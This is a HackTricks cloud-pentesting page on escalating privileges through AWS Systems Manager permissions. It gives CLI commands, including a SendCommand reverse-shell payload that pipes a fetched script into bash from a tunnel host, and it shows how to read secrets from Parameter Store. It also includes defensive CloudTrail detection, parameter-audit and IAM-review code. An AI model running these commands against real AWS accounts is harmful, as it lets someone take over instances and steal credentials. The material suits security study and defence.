# AWS - SSM Privesc
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## SSM

For more information about SSM check:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
### ssm:SendCommand

An attacker with the permission ssm:SendCommand can execute commands in instances running the Amazon SSM Agent and compromise the IAM Role running inside of it.

```bash
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
    --document-name "AWS-RunShellScript" --output text \
    --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
```

If you are using this technique to escalate privileges inside an EC2 instance that is already compromised, you can just capture the rev shell locally with:

```bash
# If you are in the machine you can capture the reverse shell inside of it
nc -lvnp 4444 # Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
    --document-name "AWS-RunShellScript" --output text \
    --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
```

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
### ssm:StartSession

An attacker with the permission ssm:StartSession can start an SSH-like session in instances running the Amazon SSM Agent and compromise the IAM Role running inside of it.

```bash
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Start an interactive session on the instance
aws ssm start-session --target "$INSTANCE_ID"
```

Caution: to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running.
### Privesc to ECS

When ECS tasks run with ExecuteCommand enabled, users with enough permissions can use ecs execute-command to execute a command inside the container.

According to the documentation this is done by creating a secure channel between the device you use to initiate the "exec" command and the target container with SSM Session Manager. (The SSM Session Manager Plugin is required for this to work.)

Therefore, users with ssm:StartSession will be able to get a shell inside ECS tasks if that option is enabled by running:

```bash
aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
```

Potential Impact: Direct privesc to the ECS IAM roles attached to running tasks with ExecuteCommand enabled.
### ssm:ResumeSession

An attacker with the permission ssm:ResumeSession can resume an SSH-like session in instances running the Amazon SSM Agent that has a disconnected SSM session state, and compromise the IAM Role running inside of it.

```bash
# Check for configured instances (--state is required by the API)
aws ssm describe-sessions --state Active

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
    --session-id Mary-Major-07a16060613c408b5
```

Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconnected sessions.
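All four paths above (SendCommand, StartSession, the ECS execute-command target and ResumeSession) are recorded as CloudTrail management events from ssm.amazonaws.com, which is what a defender should be watching. The following is an added example, not part of the original page, of detection logic run over exported CloudTrail records. The records are constructed samples; the field names follow CloudTrail's schema (eventSource, eventName, userIdentity, requestParameters), and it is assumed that SendCommand's requestParameters carry documentName and the commands parameter as shown.

```python
"""Flag CloudTrail events matching the SSM paths above (added example, not from the page)."""
import json
import re

# Constructed CloudTrail records: sample data shaped like CloudTrail's Records
# entries. Identities, instance ids, cluster and session ids are made up.
SAMPLE_RECORDS = [
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"documentName": "AWS-RunShellScript",
                           "instanceIds": ["i-0abc123def4567890"],
                           "parameters": {"commands": ["curl https://example.invalid/x | bash"]}}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:role/PatchAutomation"},
     "requestParameters": {"documentName": "AWS-RunPatchBaseline",
                           "instanceIds": ["i-0abc123def4567890"],
                           "parameters": {"Operation": ["Scan"]}}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "StartSession",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"target": "ecs:prod-cluster_0123456789abcdef_0123456789abcdef-0000000001"}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "ResumeSession",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {"sessionId": "contractor-0123456789abcdef0"}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/contractor"},
     "requestParameters": {}},
]

# A shell command that downloads something and pipes it straight into a shell.
PIPE_TO_SHELL = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b")


def classify(record):
    """Return (severity, reason) for one CloudTrail record, or None if not of interest."""
    if record.get("eventSource") != "ssm.amazonaws.com":
        return None
    name = record.get("eventName")
    params = record.get("requestParameters") or {}
    if name == "SendCommand":
        doc = params.get("documentName")
        if doc != "AWS-RunShellScript":
            return ("low", "SendCommand with document %s" % doc)
        cmds = (params.get("parameters") or {}).get("commands") or []
        if any(PIPE_TO_SHELL.search(c) for c in cmds):
            return ("high", "AWS-RunShellScript piping downloaded content into a shell")
        return ("medium", "AWS-RunShellScript ad-hoc command")
    if name == "StartSession":
        target = params.get("target", "")
        if target.startswith("ecs:"):
            # Session Manager target of the form ecs:CLUSTER_TASK_RUNTIME means an ECS exec.
            return ("high", "interactive session into an ECS task: %s" % target)
        return ("medium", "interactive session on %s" % target)
    if name == "ResumeSession":
        return ("medium", "resumed session %s" % params.get("sessionId"))
    return None


def find_alerts(records):
    """Run classify over an iterable of CloudTrail records and return the hits, in order."""
    alerts = []
    for r in records:
        hit = classify(r)
        if hit:
            severity, reason = hit
            alerts.append({"severity": severity,
                           "actor": (r.get("userIdentity") or {}).get("arn"),
                           "event": r.get("eventName"), "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_RECORDS):
        print(json.dumps(alert))
```

The severity split keeps routine automation (patch baselines run by a known role) quiet while raising ad-hoc AWS-RunShellScript usage, session starts into ECS tasks and resumed sessions; correlating the actor ARN against the principals that are expected to use Session Manager is the obvious next filter.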
### ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

An attacker with the indicated permissions is going to be able to list the SSM parameters and read them in plaintext. In these parameters you can frequently find sensitive information such as SSH keys or API keys.

```bash
aws ssm describe-parameters

# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption
```

Potential Impact: Find sensitive information inside the parameters.
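The reason parameters like id_rsa are readable in plaintext is usually that they were created as plain String parameters, or as SecureString under the AWS-managed aws/ssm key, which any principal in the account with ssm:GetParameter and --with-decryption can use. The following is an added example, not from the original page, of an audit over the JSON that `aws ssm describe-parameters` returns; the document below is a constructed sample of that shape, not output from a real account, and the list of secret-looking name fragments is an assumption you would tune to your naming scheme.

```python
"""Audit SSM parameter metadata for secrets not stored as SecureString (added example)."""
import json
import re

# Constructed sample of `aws ssm describe-parameters` output (not a real account).
SAMPLE_DESCRIBE_PARAMETERS = json.loads("""
{
  "Parameters": [
    {"Name": "id_rsa", "Type": "String", "Tier": "Standard"},
    {"Name": "/prod/db/password", "Type": "SecureString", "KeyId": "alias/aws/ssm", "Tier": "Standard"},
    {"Name": "/prod/api/token", "Type": "String", "Tier": "Standard"},
    {"Name": "/prod/app/log_level", "Type": "String", "Tier": "Standard"},
    {"Name": "/prod/kms-backed/secret", "Type": "SecureString", "KeyId": "alias/app-secrets", "Tier": "Standard"}
  ]
}
""")

# Name fragments that usually mean the value is a credential (assumed list; tune it).
SECRET_HINTS = re.compile(r"(id_rsa|\.pem$|password|passwd|secret|token|api[-_]?key|private)", re.I)


def audit_parameters(doc):
    """Return findings for (a) secret-looking names that are not SecureString and
    (b) SecureStrings under the AWS-managed key, which adds no extra KMS gate."""
    findings = []
    for p in doc.get("Parameters", []):
        name, ptype = p.get("Name", ""), p.get("Type", "")
        looks_secret = bool(SECRET_HINTS.search(name))
        if looks_secret and ptype != "SecureString":
            findings.append({"name": name,
                             "issue": "secret-looking name stored as %s; readable by anyone with ssm:GetParameter" % ptype})
        elif ptype == "SecureString" and p.get("KeyId") == "alias/aws/ssm":
            findings.append({"name": name,
                             "issue": "SecureString under the AWS-managed key; a customer-managed KMS key "
                                      "would additionally require kms:Decrypt on that key"})
    return findings


if __name__ == "__main__":
    for f in audit_parameters(SAMPLE_DESCRIBE_PARAMETERS):
        print("%-28s %s" % (f["name"], f["issue"]))
```

Moving a flagged value to SecureString under a customer-managed key means that ssm:GetParameter alone is no longer enough to read it: the caller must also be allowed kms:Decrypt by that key's policy, which is the control this section's privesc path is missing.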
### ssm:ListCommands

An attacker with this permission can list all the commands sent and hopefully find sensitive information on them.

```bash
aws ssm list-commands
```

Potential Impact: Find sensitive information inside the command lines.
### ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

An attacker with these permissions can list all the commands sent and read the output generated, hoping to find sensitive information in it.

```bash
# You can use either option to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations
aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
```

Potential Impact: Find sensitive information inside the output of the command lines.
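Every section on this page starts from a single SSM permission, and most of them are handed out indirectly through wildcards such as ssm:Get* or ssm:*. The following is an added example, not from the original page, of a policy review that reports which of the permissions discussed above an IAM policy document actually grants. The policy is a constructed sample; action matching follows IAM's case-insensitive `*` and `?` wildcard semantics, implemented here with fnmatch. It deliberately treats only an unconditional Deny on Resource "*" as cancelling a grant and does not evaluate Condition blocks or NotResource, so it errs on the side of reporting a permission.

```python
"""Report which SSM permissions from this page an IAM policy grants (added example)."""
import fnmatch
import json

# The actions covered on this page and what each gives a caller.
RISKY_SSM_ACTIONS = {
    "ssm:SendCommand": "run commands on SSM-managed instances",
    "ssm:StartSession": "interactive session on instances or ECS tasks",
    "ssm:ResumeSession": "resume a disconnected session",
    "ssm:DescribeParameters": "enumerate Parameter Store",
    "ssm:GetParameter": "read parameter values",
    "ssm:GetParameters": "read parameter values",
    "ssm:ListCommands": "read previously sent command lines",
    "ssm:ListCommandInvocations": "enumerate command invocations",
    "ssm:GetCommandInvocation": "read command output",
}

# Constructed sample policy: broad read wildcards, a scoped SendCommand grant,
# and an explicit Deny that removes the parameter-reading actions.
SAMPLE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["ssm:Describe*", "ssm:Get*", "ssm:List*"], "Resource": "*"},
    {"Effect": "Allow", "Action": "ssm:SendCommand",
     "Resource": ["arn:aws:ssm:*:*:document/AWS-RunPatchBaseline", "arn:aws:ec2:*:*:instance/*"]},
    {"Effect": "Deny", "Action": "ssm:GetParameter*", "Resource": "*"}
  ]
}
""")


def _as_list(value):
    """IAM accepts a string or a list in Action/NotAction/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _matches(pattern, action):
    """IAM action matching is case-insensitive and supports * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def granted_risky_actions(policy):
    """Return {action: {"reason": ..., "resources": [...]}} for every risky action
    that some Allow statement grants and no unconditional all-resource Deny removes."""
    allowed, denied = {}, set()
    for stmt in _as_list(policy.get("Statement", [])):
        effect = stmt.get("Effect")
        resources = _as_list(stmt.get("Resource", "*"))
        if "NotAction" in stmt:
            # NotAction covers everything except the listed patterns.
            negated = _as_list(stmt["NotAction"])
            hits = [a for a in RISKY_SSM_ACTIONS if not any(_matches(p, a) for p in negated)]
        else:
            patterns = _as_list(stmt.get("Action", []))
            hits = [a for a in RISKY_SSM_ACTIONS if any(_matches(p, a) for p in patterns)]
        for action in hits:
            if effect == "Allow":
                allowed.setdefault(action, set()).update(resources)
            elif effect == "Deny" and "*" in resources and "Condition" not in stmt:
                denied.add(action)
    return {a: {"reason": RISKY_SSM_ACTIONS[a], "resources": sorted(r)}
            for a, r in sorted(allowed.items()) if a not in denied}


if __name__ == "__main__":
    for action, info in granted_risky_actions(SAMPLE_POLICY).items():
        print("%-28s %-45s %s" % (action, info["reason"], ", ".join(info["resources"])))
```

On the sample policy the wildcards quietly grant ssm:DescribeParameters, ssm:ListCommands, ssm:ListCommandInvocations and ssm:GetCommandInvocation (the command-output path of this section), while the Deny does remove ssm:GetParameter and ssm:GetParameters. The resources column is worth reading too: a SendCommand grant restricted to the AWS-RunPatchBaseline document is far less useful to an attacker than one on "*", which is how the page's AWS-RunShellScript payload becomes possible.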
## Codebuild

You can also use SSM to get inside a codebuild project that is being built: